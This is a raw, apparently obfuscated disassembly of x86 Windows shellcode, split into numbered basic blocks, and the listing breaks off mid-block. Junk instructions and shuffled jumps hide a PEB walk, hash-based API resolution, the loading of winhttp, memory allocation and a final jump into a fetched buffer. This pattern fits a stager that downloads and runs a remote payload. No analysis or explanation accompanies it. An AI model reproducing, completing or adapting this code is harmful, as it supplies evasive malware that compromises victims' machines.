###############################
0 :  0x0 cld 
0 :  0x1 call 0x675
0 :  0x6 pushf 
0 :  0x8 add cl, 0
0 :  0xb jmp 0x94f
###############################
1 :  0x10 xor bl, 0
1 :  0x13 popf 
1 :  0x15 push ebx
1 :  0x16 pushf 
1 :  0x18 jmp 0x1df
###############################
2 :  0x1d pushf 
2 :  0x1f add ch, 0
2 :  0x22 popf 
2 :  0x24 pushf 
2 :  0x26 jmp 0x4cd
###############################
3 :  0x2b add byte ptr [esi], cl
3 :  0x2e jbe 0x30
3 :  0x30 imul eax, dword ptr [eax], 0x630046
3 :  0x36 pop edx
3 :  0x37 jmp 0x9e
###############################
4 :  0x39 add byte ptr [eax], ch
4 :  0x3c push ebx
4 :  0x3d pushf 
4 :  0x3f add dh, 0
4 :  0x42 jmp 0x8e5
###############################
5 :  0x47 lea ebx, [ebx]
5 :  0x49 popf 
5 :  0x4b pushf 
5 :  0x4d sar ebx, 0
5 :  0x50 jmp 0x705
###############################
6 :  0x55 pushf 
6 :  0x57 dec cx
6 :  0x59 inc cx
6 :  0x5b popf 
6 :  0x5d jmp 0x581
###############################
7 :  0x62 rcr dx, 0
7 :  0x66 popf 
7 :  0x68 push esp
7 :  0x69 push 0x726774c
7 :  0x6e jmp 0x47e
###############################
8 :  0x73 pushf 
8 :  0x75 nop 
8 :  0x76 popf 
8 :  0x78 imul eax, dword ptr [eax], 0x700064
8 :  0x7e jmp 0x690
###############################
9 :  0x83 pushf 
9 :  0x85 dec bx
9 :  0x87 inc bx
9 :  0x89 popf 
9 :  0x8b jmp 0x214
###############################
10 :  0x90 add ebx, 0
10 :  0x93 popf 
10 :  0x95 add byte ptr [esi], ch
10 :  0x98 pop edx
10 :  0x99 jmp 0x8b8
###############################
11 :  0x9e add byte ptr [esi], dl
11 :  0xa1 pushf 
11 :  0xa3 or ch, ch
11 :  0xa5 popf 
11 :  0xa7 jmp 0xaf1
###############################
12 :  0xac push eax
12 :  0xad add ebx, edx
12 :  0xaf test ecx, ecx
12 :  0xb1 je 0xa17
12 :  0xb7 jmp 0x89a
###############################
13 :  0xbc popf 
13 :  0xbe pushf 
13 :  0xc0 nop 
13 :  0xc1 popf 
13 :  0xc3 jmp 0x542
###############################
14 :  0xc8 nop 
14 :  0xc9 popf 
14 :  0xcb add esp, -0x10
14 :  0xce mov eax, esp
14 :  0xd0 jmp 0x9da
###############################
15 :  0xd5 pushf 
15 :  0xd7 sar edi, 0
15 :  0xda popf 
15 :  0xdc pushf 
15 :  0xde jmp 0x3b4
###############################
16 :  0xe3 add byte ptr [esi], ch
16 :  0xe6 add esp, 1
16 :  0xe9 pushf 
16 :  0xeb rcl esi, 0
16 :  0xee jmp 0x198
###############################
17 :  0xf3 pushf 
17 :  0xf5 shl ecx, 0
17 :  0xf8 popf 
17 :  0xfa pushf 
17 :  0xfc jmp 0x489
###############################
18 :  0x101 popf 
18 :  0x103 sub eax, 1
18 :  0x106 add byte ptr [eax], dh
18 :  0x109 dec eax
18 :  0x10a jmp 0x403
###############################
19 :  0x10f sar bh, 0
19 :  0x112 popf 
19 :  0x114 pop eax
19 :  0x115 add edi, eax
19 :  0x117 jmp 0xae2
###############################
20 :  0x11c shr di, 0
20 :  0x120 popf 
20 :  0x122 add byte ptr [edx], dh
20 :  0x124 nop 
20 :  0x125 jmp 0x82a
###############################
21 :  0x12a pushf 
21 :  0x12c rcl ebx, 0
21 :  0x12f popf 
21 :  0x131 add byte ptr [edx], bh
21 :  0x133 jmp 0x4a9
###############################
22 :  0x138 add si, 0
22 :  0x13c popf 
22 :  0x13e je 0x27b
22 :  0x144 mov eax, dword ptr [edi + 4]
22 :  0x147 jmp 0x92e
###############################
23 :  0x14c and ch, ch
23 :  0x14e popf 
23 :  0x150 ja 0x152
23 :  0x152 dec ebx
23 :  0x153 jmp 0x1d1
###############################
24 :  0x155 push 0x2000
24 :  0x15a push ebx
24 :  0x15b push esi
24 :  0x15c push 0x7e24296c
24 :  0x161 jmp 0x2a6
###############################
25 :  0x166 xor dx, 0
25 :  0x16a popf 
25 :  0x16c pushf 
25 :  0x16e mov ebx, ebx
25 :  0x170 jmp 0xbc
###############################
26 :  0x175 popal 
26 :  0x176 pop ecx
26 :  0x177 pop edx
26 :  0x178 push ecx
26 :  0x179 jmp 0x6b9
###############################
27 :  0x17e push ebx
27 :  0x17f pushf 
27 :  0x181 mov cx, cx
27 :  0x184 popf 
27 :  0x186 jmp 0xa50
###############################
28 :  0x18b add edi, 0
28 :  0x18e popf 
28 :  0x190 pushf 
28 :  0x192 nop 
28 :  0x193 jmp 0xa40
###############################
29 :  0x198 popf 
29 :  0x19a pushf 
29 :  0x19c mov bx, bx
29 :  0x19f popf 
29 :  0x1a1 jmp 0x4e8
###############################
30 :  0x1a6 call 0x208
30 :  0x1ab nop 
30 :  0x1ac push ebx
30 :  0x1ad nop 
30 :  0x1ae jmp 0x903
###############################
31 :  0x1b3 pushf 
31 :  0x1b5 sar cl, 0
31 :  0x1b8 popf 
31 :  0x1ba sub ebx, 1
31 :  0x1bd jmp 0xa21
###############################
32 :  0x1c2 xor eax, eax
32 :  0x1c4 ror edi, 0xd
32 :  0x1c7 pushf 
32 :  0x1c9 or di, di
32 :  0x1cc jmp 0x3e3
###############################
33 :  0x1d1 add byte ptr [eax + eax], dh
33 :  0x1d4 push ebp
33 :  0x1d5 add byte ptr [eax], bl
33 :  0x1d8 pushf 
33 :  0x1da jmp 0x657
###############################
34 :  0x1df sub eax, 0
34 :  0x1e2 popf 
34 :  0x1e4 pushf 
34 :  0x1e6 sub eax, 0
34 :  0x1e9 jmp 0x4b5
###############################
35 :  0x1ee inc bx
35 :  0x1f0 popf 
35 :  0x1f2 push ebx
35 :  0x1f3 push esi
35 :  0x1f4 jmp 0x54f
###############################
36 :  0x1f9 pushf 
36 :  0x1fb dec ax
36 :  0x1fd inc ax
36 :  0x1ff popf 
36 :  0x201 jmp 0xa9b
###############################
37 :  0x206 add ebp, 1
37 :  0x209 add byte ptr [esi], al
37 :  0x20c push ebp
37 :  0x20d pushf 
37 :  0x20f jmp 0xa0a
###############################
38 :  0x214 add byte ptr [eax], al
38 :  0x216 pushf 
38 :  0x218 sub edi, 0
38 :  0x21b popf 
38 :  0x21d jmp 0xa30
###############################
39 :  0x222 popf 
39 :  0x224 sub edx, 1
39 :  0x227 add byte ptr [edx], dh
39 :  0x22a imul eax, dword ptr [eax], 0x720059
39 :  0x230 jmp 0xad3
###############################
40 :  0x235 nop 
40 :  0x236 popf 
40 :  0x238 push 0x686e6977
40 :  0x23d pushf 
40 :  0x23f jmp 0x166
###############################
41 :  0x244 pushf 
41 :  0x246 xor bp, 0
41 :  0x24a popf 
41 :  0x24c pushf 
41 :  0x24e jmp 0x90
###############################
42 :  0x253 pushf 
42 :  0x255 xor bh, 0
42 :  0x258 popf 
42 :  0x25a push ebx
42 :  0x25b jmp 0x17e
###############################
43 :  0x260 je 0xa18
43 :  0x266 add eax, edx
43 :  0x268 mov ecx, dword ptr [eax + 0x18]
43 :  0x26b mov ebx, dword ptr [eax + 0x20]
43 :  0x26e jmp 0xac
###############################
44 :  0x273 push esi
44 :  0x274 push 0xce9d58d3
44 :  0x279 call ebp
44 :  0x27b push 0xa
44 :  0x27d jmp 0xa8d
###############################
45 :  0x282 popf 
45 :  0x284 pushf 
45 :  0x286 rcr bl, 0
45 :  0x289 popf 
45 :  0x28b jmp 0x712
###############################
46 :  0x290 inc ecx
46 :  0x291 popf 
46 :  0x293 nop 
46 :  0x294 cmp al, byte ptr [eax]
46 :  0x296 jmp 0x7a1
###############################
47 :  0x29b popf 
47 :  0x29d mov edx, dword ptr [edx + 0x14]
47 :  0x2a0 pushf 
47 :  0x2a2 dec bh
47 :  0x2a4 jmp 0x2b3
###############################
48 :  0x2a6 call ebp
48 :  0x2a8 test eax, eax
48 :  0x2aa pushf 
48 :  0x2ac dec dx
48 :  0x2ae jmp 0x740
###############################
49 :  0x2b3 inc bh
49 :  0x2b5 popf 
49 :  0x2b7 pushf 
49 :  0x2b9 sar dx, 0
49 :  0x2bd jmp 0x992
###############################
50 :  0x2c2 push esp
50 :  0x2c3 add byte ptr [ebp], dl
50 :  0x2c6 ja 0x2c8
50 :  0x2c8 xor al, 0
50 :  0x2ca jmp 0x5b8
###############################
51 :  0x2cf add byte ptr [eax], dh
51 :  0x2d1 pushf 
51 :  0x2d3 mov bp, bp
51 :  0x2d6 popf 
51 :  0x2d8 jmp 0x534
###############################
52 :  0x2dd pushf 
52 :  0x2df nop 
52 :  0x2e0 popf 
52 :  0x2e2 call ebp
52 :  0x2e4 jmp 0x2fd
###############################
53 :  0x2e6 push 0x4d2
53 :  0x2eb call 0x63a
53 :  0x2f0 push 0x74007400
53 :  0x2f5 add byte ptr [eax], dh
53 :  0x2f8 jmp 0x912
###############################
54 :  0x2fd pushf 
54 :  0x2ff and bh, bh
54 :  0x301 popf 
54 :  0x303 pushf 
54 :  0x305 jmp 0x350
###############################
55 :  0x307 rcr sp, 0
55 :  0x30b popf 
55 :  0x30d test eax, eax
55 :  0x30f pushf 
55 :  0x311 jmp 0x77f
###############################
56 :  0x316 xor al, byte ptr [eax]
56 :  0x318 aaa 
56 :  0x319 add byte ptr [esi], ch
56 :  0x31b add byte ptr [eax], dh
56 :  0x31d jmp 0x610
###############################
57 :  0x322 pushf 
57 :  0x324 dec si
57 :  0x326 inc si
57 :  0x328 popf 
57 :  0x32a jmp 0x5f3
###############################
58 :  0x32f test eax, eax
58 :  0x331 je 0x27b
58 :  0x337 push 4
58 :  0x339 pushf 
58 :  0x33b jmp 0x10f
###############################
59 :  0x340 sub edx, 1
59 :  0x343 pushf 
59 :  0x345 rcl ax, 0
59 :  0x349 popf 
59 :  0x34b jmp 0x802
###############################
60 :  0x350 nop 
60 :  0x351 popf 
60 :  0x353 test eax, eax
60 :  0x355 pushf 
60 :  0x357 jmp 0x93e
###############################
61 :  0x35c or edi, edi
61 :  0x35e popf 
61 :  0x360 add ebx, eax
61 :  0x362 pushf 
61 :  0x364 jmp 0x307
###############################
62 :  0x366 mov edx, dword ptr fs:[edx + 0x30]
62 :  0x36a mov edx, dword ptr [edx + 0xc]
62 :  0x36d pushf 
62 :  0x36f or ah, ah
62 :  0x371 jmp 0x29b
###############################
63 :  0x376 test eax, eax
63 :  0x378 je 0x27b
63 :  0x37e jmp 0x7af
63 :  0x383 mov eax, dword ptr [edi + 8]
63 :  0x386 jmp 0x32f
###############################
64 :  0x388 inc edx
64 :  0x389 add byte ptr [ebp], ch
64 :  0x38c add esi, 1
64 :  0x38f add byte ptr [edi], dl
64 :  0x392 jmp 0x6f8
###############################
65 :  0x397 add byte ptr [edx], bl
65 :  0x39a bound eax, qword ptr [eax]
65 :  0x39c pop ecx
65 :  0x39d add byte ptr [ebx], dh
65 :  0x39f jmp 0x67f
###############################
66 :  0x3a4 sar edx, 0
66 :  0x3a7 popf 
66 :  0x3a9 push ebx
66 :  0x3aa push 0xe553a458
66 :  0x3af jmp 0x1d
###############################
67 :  0x3b4 and esi, esi
67 :  0x3b6 popf 
67 :  0x3b8 ror edi, 0xd
67 :  0x3bb add edi, eax
67 :  0x3bd jmp 0xb1e
###############################
68 :  0x3c2 dec sp
68 :  0x3c4 inc sp
68 :  0x3c6 popf 
68 :  0x3c8 inc edi
68 :  0x3c9 jmp 0x81b
###############################
69 :  0x3ce pushf 
69 :  0x3d0 nop 
69 :  0x3d1 popf 
69 :  0x3d3 push eax
69 :  0x3d4 jmp 0x9c2
###############################
70 :  0x3d9 mov eax, esp
70 :  0x3db add esp, -0xc
70 :  0x3de mov edi, esp
70 :  0x3e0 push edi
70 :  0x3e1 jmp 0x3ce
###############################
71 :  0x3e3 popf 
71 :  0x3e5 lodsb al, byte ptr [esi]
71 :  0x3e6 add edi, eax
71 :  0x3e8 cmp al, ah
71 :  0x3ea jmp 0x3ec
###############################
72 :  0x3ec jne 0x1c2
72 :  0x3f2 add edi, dword ptr [ebp - 8]
72 :  0x3f5 cmp edi, dword ptr [ebp + 0x24]
72 :  0x3f8 jne 0xaf
72 :  0x3fe jmp 0x61d
###############################
73 :  0x403 add byte ptr [ebx], dl
73 :  0x406 push 0x34007700
73 :  0x40b add byte ptr [edi], bl
73 :  0x40e add byte ptr [bx + si], bh
73 :  0x412 jmp 0x722
###############################
74 :  0x417 mov di, di
74 :  0x41a popf 
74 :  0x41c add byte ptr [eax], dh
74 :  0x41e add byte ptr [esi], ch
74 :  0x421 jmp 0x2c2
###############################
75 :  0x426 mov edx, dword ptr [edx + 0x10]
75 :  0x429 mov eax, dword ptr [edx + 0x3c]
75 :  0x42c pushf 
75 :  0x42e shl ax, 0
75 :  0x432 jmp 0x977
###############################
76 :  0x437 pop ebx
76 :  0x438 pushf 
76 :  0x43a dec di
76 :  0x43c inc di
76 :  0x43e jmp 0x5da
###############################
77 :  0x443 popf 
77 :  0x445 pushf 
77 :  0x447 or ch, ch
77 :  0x449 popf 
77 :  0x44b jmp 0x83
###############################
78 :  0x450 jb 0x452
78 :  0x452 push 0x35004400
78 :  0x457 add byte ptr [ebp], al
78 :  0x45a pushf 
78 :  0x45c jmp 0x837
###############################
79 :  0x461 imul eax, dword ptr [eax], 0x39
79 :  0x464 add byte ptr [ecx], dl
79 :  0x467 dec ecx
79 :  0x468 add byte ptr [edi], ah
79 :  0x46b jmp 0x9e7
###############################
80 :  0x470 pushf 
80 :  0x472 mov cx, cx
80 :  0x475 popf 
80 :  0x477 pushf 
80 :  0x479 jmp 0x138
###############################
81 :  0x47e call ebp
81 :  0x480 xor ebx, ebx
81 :  0x482 push ebx
81 :  0x483 push ebx
81 :  0x484 jmp 0x760
###############################
82 :  0x489 sar edx, 0
82 :  0x48c popf 
82 :  0x48e ret 0xd5ff
82 :  0x491 pushf 
82 :  0x493 jmp 0x7d9
###############################
83 :  0x498 rcl ch, 0
83 :  0x49b popf 
83 :  0x49d add byte ptr [edx], al
83 :  0x4a1 sub ecx, 1
83 :  0x4a4 jmp 0x55d
###############################
84 :  0x4a9 add byte ptr [ecx], dh
84 :  0x4ab add byte ptr [edx], dh
84 :  0x4ad add byte ptr [ebx], dh
84 :  0x4af nop 
84 :  0x4b0 jmp 0x59c
###############################
85 :  0x4b5 popf 
85 :  0x4b7 push eax
85 :  0x4b8 push 3
85 :  0x4ba push 3
85 :  0x4bc jmp 0x3d9
###############################
86 :  0x4c1 nop 
86 :  0x4c2 popf 
86 :  0x4c4 pushf 
86 :  0x4c6 and esi, esi
86 :  0x4c8 jmp 0x602
###############################
87 :  0x4cd sub bp, 0
87 :  0x4d1 popf 
87 :  0x4d3 call ebp
87 :  0x4d5 xchg ebx, eax
87 :  0x4d6 jmp 0x9d0
###############################
88 :  0x4db pushf 
88 :  0x4dd dec al
88 :  0x4df inc al
88 :  0x4e1 popf 
88 :  0x4e3 jmp 0x426
###############################
89 :  0x4e8 add byte ptr [edi], bl
89 :  0x4eb push ebx
89 :  0x4ec add byte ptr [edx], dl
89 :  0x4ef xor dword ptr [eax], eax
89 :  0x4f1 jmp 0x62c
###############################
90 :  0x4f6 add byte ptr [esi], ch
90 :  0x4f9 je 0x4fb
90 :  0x4fb xor al, 0
90 :  0x4fd jno 0xab0
90 :  0x503 jmp 0xab0
###############################
91 :  0x508 pushf 
91 :  0x50a add ch, 0
91 :  0x50d popf 
91 :  0x50f pushf 
91 :  0x511 jmp 0x35c
###############################
92 :  0x516 inc esp
92 :  0x517 add byte ptr [ecx], bl
92 :  0x51a add byte ptr ss:[edx], bh
92 :  0x51e pushf 
92 :  0x520 jmp 0x7e8
###############################
93 :  0x525 add edx, 1
93 :  0x528 add byte ptr [ecx], dh
93 :  0x52b pop ecx
93 :  0x52c add byte ptr [esi], ch
93 :  0x52f jmp 0x7cb
###############################
94 :  0x534 add byte ptr [esi], ch
94 :  0x536 pushf 
94 :  0x538 sar al, 0
94 :  0x53b popf 
94 :  0x53d jmp 0xafe
###############################
95 :  0x542 pushf 
95 :  0x544 sub al, 0
95 :  0x546 popf 
95 :  0x548 pushf 
95 :  0x54a jmp 0x62
###############################
96 :  0x54f push 0x91bb5895
96 :  0x554 pushf 
96 :  0x556 dec eax
96 :  0x557 inc eax
96 :  0x558 jmp 0x282
###############################
97 :  0x55d add byte ptr [0x4d006900], ch
97 :  0x563 add byte ptr [eax + eax], dh
97 :  0x566 add edx, 1
97 :  0x569 add byte ptr [eax + eax + 0x52], dl
97 :  0x56d jmp 0xe3
###############################
98 :  0x572 add byte ptr [esi], dh
98 :  0x574 add byte ptr [edx], dl
98 :  0x577 insd dword ptr es:[edi], dx
98 :  0x578 add byte ptr [eax + eax + 0x33], dl
98 :  0x57c jmp 0x647
###############################
99 :  0x581 pushf 
99 :  0x583 sub cl, 0
99 :  0x586 popf 
99 :  0x588 inc esi
99 :  0x589 jmp 0x2b
###############################
100 :  0x58e popf 
100 :  0x590 pushf 
100 :  0x592 shl eax, 0
100 :  0x595 popf 
100 :  0x597 jmp 0x470
###############################
101 :  0x59c add byte ptr [eax + eax], dh
101 :  0x59f pushf 
101 :  0x5a1 dec ebx
101 :  0x5a2 inc ebx
101 :  0x5a3 jmp 0x9b5
###############################
102 :  0x5a8 add byte ptr [esi], ch
102 :  0x5ab add byte ptr gs:[edx], ah
102 :  0x5af pushf 
102 :  0x5b1 or ecx, ecx
102 :  0x5b3 jmp 0x101
###############################
103 :  0x5b8 pushf 
103 :  0x5ba rcl bh, 0
103 :  0x5bd popf 
103 :  0x5bf nop 
103 :  0x5c0 jmp 0x55
###############################
104 :  0x5c5 push ebx
104 :  0x5c6 push edi
104 :  0x5c7 push ebx
104 :  0x5c8 push eax
104 :  0x5c9 jmp 0x850
###############################
105 :  0x5ce and edx, edx
105 :  0x5d0 popf 
105 :  0x5d2 jno 0x5d4
105 :  0x5d4 aaa 
105 :  0x5d5 jmp 0x9a5
###############################
106 :  0x5da popf 
106 :  0x5dc pushf 
106 :  0x5de sar ecx, 0
106 :  0x5e1 popf 
106 :  0x5e3 jmp 0x175
###############################
107 :  0x5e8 push ebx
107 :  0x5e9 pushf 
107 :  0x5eb lea sp, [bx + si]
107 :  0x5ef popf 
107 :  0x5f1 jmp 0x5c5
###############################
108 :  0x5f3 insd dword ptr es:[edi], dx
108 :  0x5f4 add byte ptr [ecx], ah
108 :  0x5f7 add byte ptr ss:[ebx], dh
108 :  0x5fb pushf 
108 :  0x5fd jmp 0x18b
###############################
109 :  0x602 popf 
109 :  0x604 add eax, edx
109 :  0x606 mov dword ptr [esp + 0x24], eax
109 :  0x60a pop ebx
109 :  0x60b jmp 0x437
###############################
110 :  0x610 add byte ptr [esi], ch
110 :  0x612 add byte ptr [eax], dh
110 :  0x614 add byte ptr [esi], ch
110 :  0x616 add byte ptr [ecx], dh
110 :  0x618 jmp 0x8c8
###############################
111 :  0x61d pop eax
111 :  0x61e mov ebx, dword ptr [eax + 0x24]
111 :  0x621 add ebx, edx
111 :  0x623 mov cx, word ptr [ebx + ecx*2]
111 :  0x627 jmp 0x8a9
###############################
112 :  0x62c dec eax
112 :  0x62d pushf 
112 :  0x62f sub edx, 0
112 :  0x632 popf 
112 :  0x634 jmp 0x9f8
###############################
113 :  0x639 ret 
113 :  0x63a pop edi
113 :  0x63b call 0x55b
113 :  0x640 xor dword ptr [eax], eax
113 :  0x642 jmp 0x316
###############################
114 :  0x647 add byte ptr [ebp], dh
114 :  0x64a inc edi
114 :  0x64b add byte ptr [eax + eax + 0x66], ch
114 :  0x64f add byte ptr [eax], ch
114 :  0x652 jmp 0x388
###############################
115 :  0x657 shr edi, 0
115 :  0x65a popf 
115 :  0x65c jae 0x65e
115 :  0x65e xor al, byte ptr [eax]
115 :  0x660 jmp 0x1f9
###############################
116 :  0x665 shl si, 0
116 :  0x669 popf 
116 :  0x66b call ebp
116 :  0x66d push eax
116 :  0x66e jmp 0x6ea
###############################
117 :  0x670 jmp 0x994
117 :  0x675 pop ebp
117 :  0x676 pushf 
117 :  0x678 dec dx
117 :  0x67a jmp 0x878
###############################
118 :  0x67f add byte ptr [edx], ah
118 :  0x682 pop ecx
118 :  0x683 add byte ptr [edi], al
118 :  0x686 push 0x55003000
118 :  0x68b jmp 0x791
###############################
119 :  0x690 popal 
119 :  0x691 add byte ptr [ecx], dl
119 :  0x694 pushf 
119 :  0x696 rcr bh, 0
119 :  0x699 jmp 0x72f
###############################
120 :  0x69e nop 
120 :  0x69f popf 
120 :  0x6a1 pushf 
120 :  0x6a3 dec ecx
120 :  0x6a4 jmp 0x290
###############################
121 :  0x6a9 popf 
121 :  0x6ab add byte ptr [edx], al
121 :  0x6ae sub eax, 1
121 :  0x6b1 add byte ptr [ebp], al
121 :  0x6b4 jmp 0xb0c
###############################
122 :  0x6b9 pushf 
122 :  0x6bb xor dh, 0
122 :  0x6be popf 
122 :  0x6c0 jmp eax
122 :  0x6c2 jmp 0xa17
###############################
123 :  0x6c7 xor eax, 0x31003100
123 :  0x6cc add byte ptr [esi], al
123 :  0x6cf push 0
123 :  0x6d1 imul eax, dword ptr [eax], 0x580046
123 :  0x6d7 jmp 0x450
###############################
124 :  0x6dc push ebx
124 :  0x6dd push ebx
124 :  0x6de push 0xbb9d1f04
124 :  0x6e3 pushf 
124 :  0x6e5 jmp 0x665
###############################
125 :  0x6ea push ebx
125 :  0x6eb pushf 
125 :  0x6ed sub dx, 0
125 :  0x6f1 popf 
125 :  0x6f3 jmp 0x2e6
###############################
126 :  0x6f8 pushf 
126 :  0x6fa xor ebx, 0
126 :  0x6fd popf 
126 :  0x6ff dec eax
126 :  0x700 jmp 0x397
###############################
127 :  0x705 popf 
127 :  0x707 jns 0x709
127 :  0x709 dec eax
127 :  0x70a add byte ptr [eax + eax], dh
127 :  0x70d jmp 0x322
###############################
128 :  0x712 call ebp
128 :  0x714 test eax, eax
128 :  0x716 jne 0x1ac
128 :  0x71c dec edi
128 :  0x71d jmp 0x888
###############################
129 :  0x722 cmp byte ptr [eax], al
129 :  0x724 jns 0x726
129 :  0x726 dec eax
129 :  0x727 add byte ptr [esi], al
129 :  0x72a jmp 0x525
###############################
130 :  0x72f popf 
130 :  0x731 jae 0x733
130 :  0x733 imul eax, dword ptr [eax], 0x35002d
130 :  0x739 pushf 
130 :  0x73b jmp 0x14c
###############################
131 :  0x740 inc dx
131 :  0x742 popf 
131 :  0x744 je 0x1a6
131 :  0x74a mov eax, dword ptr [edi]
131 :  0x74c jmp 0x508
###############################
132 :  0x751 sub ebp, 1
132 :  0x754 pushf 
132 :  0x756 add edi, 0
132 :  0x759 popf 
132 :  0x75b jmp 0x4f6
###############################
133 :  0x760 push ebx
133 :  0x761 pushf 
133 :  0x763 mov bx, bx
133 :  0x766 popf 
133 :  0x768 jmp 0x6dc
###############################
134 :  0x76d mov bx, bx
134 :  0x770 popf 
134 :  0x772 jl 0x3b8
134 :  0x778 add al, 0xe0
134 :  0x77a jmp 0xd5
###############################
135 :  0x77f shr ax, 0
135 :  0x783 popf 
135 :  0x785 jne 0x9d4
135 :  0x78b pop eax
135 :  0x78c jmp 0x639
###############################
136 :  0x791 add byte ptr [eax], bh
136 :  0x793 add byte ptr [eax + eax + 0x6f], cl
136 :  0x797 pushf 
136 :  0x799 rcr edi, 0
136 :  0x79c jmp 0x443
###############################
137 :  0x7a1 das 
137 :  0x7a2 add byte ptr [edi], ch
137 :  0x7a4 add byte ptr [ecx], dh
137 :  0x7a6 pushf 
137 :  0x7a8 jmp 0x11c
###############################
138 :  0x7ad mov dword ptr [edi], eax
138 :  0x7af push 0xc
138 :  0x7b1 push edi
138 :  0x7b2 push 0x26
138 :  0x7b4 jmp 0x273
###############################
139 :  0x7b9 shr edx, 0
139 :  0x7bc popf 
139 :  0x7be test eax, eax
139 :  0x7c0 je 0x1a6
139 :  0x7c6 jmp 0xac0
###############################
140 :  0x7cb jbe 0x7cd
140 :  0x7cd inc ecx
140 :  0x7ce add byte ptr [eax + eax + 0x67], dl
140 :  0x7d2 pushf 
140 :  0x7d4 jmp 0x417
###############################
141 :  0x7d9 or dh, dh
141 :  0x7db popf 
141 :  0x7dd push 0x100
141 :  0x7e2 push ebx
141 :  0x7e3 jmp 0x5e8
###############################
142 :  0x7e8 shr ah, 0
142 :  0x7eb popf 
142 :  0x7ed jb 0x7ef
142 :  0x7ef dec edi
142 :  0x7f0 jmp 0x244
###############################
143 :  0x7f5 pushf 
143 :  0x7f7 lea edi, [edi]
143 :  0x7f9 popf 
143 :  0x7fb pushf 
143 :  0x7fd jmp 0xb2e
###############################
144 :  0x802 add byte ptr [eax], bh
144 :  0x805 push esp
144 :  0x806 add byte ptr [edx], bl
144 :  0x809 pushf 
144 :  0x80b jmp 0x3c2
###############################
145 :  0x810 lea ebx, [ebx]
145 :  0x812 popf 
145 :  0x814 add edx, -0x2a
145 :  0x817 push 1
145 :  0x819 jmp 0x7f5
###############################
146 :  0x81b add byte ptr [esi], al
146 :  0x81e pushf 
146 :  0x820 sar esi, 0
146 :  0x823 popf 
146 :  0x825 jmp 0x73
###############################
147 :  0x82a add byte ptr [edi], dh
147 :  0x82c add byte ptr [esi], ch
147 :  0x82e add byte ptr [eax], dh
147 :  0x830 add byte ptr [esi], ch
147 :  0x832 jmp 0x2cf
###############################
148 :  0x837 mov esi, esi
148 :  0x839 popf 
148 :  0x83b jns 0x83d
148 :  0x83d push ebx
148 :  0x83e jmp 0x39
###############################
149 :  0x843 push edx
149 :  0x844 pushf 
149 :  0x846 mov ax, ax
149 :  0x849 popf 
149 :  0x84b jmp 0x572
###############################
150 :  0x850 push 0x5bb31098
150 :  0x855 call ebp
150 :  0x857 xchg esi, eax
150 :  0x858 pushf 
150 :  0x85a jmp 0xc8
###############################
151 :  0x85f xor eax, eax
151 :  0x861 lodsb al, byte ptr [esi]
151 :  0x862 cmp al, 0x61
151 :  0x864 pushf 
151 :  0x866 jmp 0x76d
###############################
152 :  0x86b mov dh, dh
152 :  0x86d popf 
152 :  0x86f pushf 
152 :  0x871 dec di
152 :  0x873 jmp 0x985
###############################
153 :  0x878 inc dx
153 :  0x87a popf 
153 :  0x87c push 0x707474
153 :  0x881 pushf 
153 :  0x883 jmp 0x235
###############################
154 :  0x888 pushf 
154 :  0x88a shl ebx, 0
154 :  0x88d popf 
154 :  0x88f jne 0x25a
154 :  0x895 jmp 0x1a6
###############################
155 :  0x89a xor edi, edi
155 :  0x89c sub ecx, 1
155 :  0x89f mov esi, dword ptr [ebx + ecx*4]
155 :  0x8a2 add esi, edx
155 :  0x8a4 jmp 0x1c2
###############################
156 :  0x8a9 mov ebx, dword ptr [eax + 0x1c]
156 :  0x8ac add ebx, edx
156 :  0x8ae mov eax, dword ptr [ebx + ecx*4]
156 :  0x8b1 pushf 
156 :  0x8b3 jmp 0x4c1
###############################
157 :  0x8b8 pushf 
157 :  0x8ba lea si, [si]
157 :  0x8be popf 
157 :  0x8c0 add byte ptr [edx], bl
157 :  0x8c3 jmp 0x6c7
###############################
158 :  0x8c8 pushf 
158 :  0x8ca rcr bx, 0
158 :  0x8ce popf 
158 :  0x8d0 add byte ptr [eax], al
158 :  0x8d2 jmp 0x39e
###############################
159 :  0x8d7 popf 
159 :  0x8d9 add byte ptr [eax + eax + 0x62], ah
159 :  0x8dd pushf 
159 :  0x8df lea ax, [bx + si]
159 :  0x8e3 jmp 0x95e
###############################
160 :  0x8e5 popf 
160 :  0x8e7 add byte ptr [eax + eax + 0x7a], cl
160 :  0x8eb pushf 
160 :  0x8ed rcr si, 0
160 :  0x8f1 jmp 0x6a9
###############################
161 :  0x8f6 add byte ptr [eax], dl
161 :  0x8f9 jo 0x8fb
161 :  0x8fb xor al, byte ptr [eax]
161 :  0x8fd insd dword ptr es:[edi], dx
161 :  0x8fe jmp 0x5a8
###############################
162 :  0x903 push esi
162 :  0x904 push 0x709d8805
162 :  0x909 call ebp
162 :  0x90b pushf 
162 :  0x90d jmp 0x7b9
###############################
163 :  0x912 pushf 
163 :  0x914 mov ebx, ebx
163 :  0x916 popf 
163 :  0x918 pushf 
163 :  0x91a jmp 0x69e
###############################
164 :  0x91f je 0x921
164 :  0x921 dec esp
164 :  0x922 add byte ptr [eax + eax + 0x52], ch
164 :  0x926 add byte ptr [ecx], dl
164 :  0x929 jmp 0x340
###############################
165 :  0x92e test eax, eax
165 :  0x930 je 0x383
165 :  0x936 pop edx
165 :  0x937 pushf 
165 :  0x939 jmp 0x810
###############################
166 :  0x93e sar sp, 0
166 :  0x942 popf 
166 :  0x944 pushf 
166 :  0x946 sar cx, 0
166 :  0x94a jmp 0x58e
###############################
167 :  0x94f popf 
167 :  0x951 pushal 
167 :  0x952 mov ebp, esp
167 :  0x954 mov edx, 0
167 :  0x959 jmp 0x366
###############################
168 :  0x95e popf 
168 :  0x960 add byte ptr [eax], ch
168 :  0x963 push ecx
168 :  0x964 add byte ptr [ebp], cl
168 :  0x967 jmp 0x516
###############################
169 :  0x96c push ebx
169 :  0x96d push ebx
169 :  0x96e pushf 
169 :  0x970 dec bx
169 :  0x972 jmp 0x1ee
###############################
170 :  0x977 popf 
170 :  0x979 add eax, edx
170 :  0x97b mov eax, dword ptr [eax + 0x78]
170 :  0x97e test eax, eax
170 :  0x980 jmp 0x260
###############################
171 :  0x985 inc di
171 :  0x987 popf 
171 :  0x989 add byte ptr [ebx], dh
171 :  0x98c dec edi
171 :  0x98d jmp 0x8f6
###############################
172 :  0x992 popf 
172 :  0x994 movzx ecx, word ptr [edx + 0x26]
172 :  0x998 mov edi, 0
172 :  0x99d mov esi, dword ptr [edx + 0x28]
172 :  0x9a0 jmp 0x85f
###############################
173 :  0x9a5 add byte ptr [ecx], dh
173 :  0x9a7 add byte ptr [eax], dh
173 :  0x9aa pushf 
173 :  0x9ac shr bp, 0
